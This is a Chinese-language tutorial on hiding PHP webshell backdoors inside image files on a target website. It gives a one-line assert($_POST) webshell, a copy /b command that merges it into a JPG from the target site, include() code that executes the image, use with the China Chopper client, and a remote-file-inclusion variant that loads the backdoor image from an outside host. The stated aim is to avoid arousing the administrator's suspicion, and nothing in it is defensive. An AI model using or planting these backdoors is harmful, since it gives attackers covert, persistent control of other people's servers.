PHP图片后门藏匿攻略

我们平时藏匿图片后门是什么流程呢？我们来看一下

0x01 初级的藏匿 *** ：

1、建立一个eval.php文件，上面加入我们的后门：

1	<?phpassert($_POST[feiji]);?>

2、找一张图片1.jpg，更好是从目标网站上下载下来的图片。

3、合并图片和php后门：

1	Copy/bC:\xampp\htdocs\images\1.jpg+C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg

4、在任何一个php文件中包含这个2.jpg的图片后门，这里以images.php为例，写入以下的代码：

1	<?phpinclude(‘2.jpg’);?>

5、上传2.jpg和images.php，在菜刀里添加一句话后门：http://127.0.0.1/images/images.php，密码为feiji。

访问图片正常：

访问images.php页面出现乱码，但是后门已经正常运行：

但是一句话在菜刀里是可以解析成功的：

注：省去第3步也是可以的，只不过直接访问图片会乱码，会让管理员起疑心。

0x02 中级藏匿的 *** ：

1、其实就是远程文件包含，也不只是针对图片，要求你有高权限，能够操纵Apache和修改php.ini文件：

• 修改ini的配置选项allow_url_fopen和allow_url_include为ON。

2、创建任何一个php文件中，以images.php为例，写入以下的代码：

1	<?php$filename=$_GET['feiji'];include($filename);?>

3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上，在菜刀里添加一句话后门：

http://127.0.0.1/images/images.php?feiji=https://www.hack56.com/images/ohtg1ki141p.jpg密码为feiji

注：这样做的优点是可以随时变换各种后门，缺点是很难获取到高权限。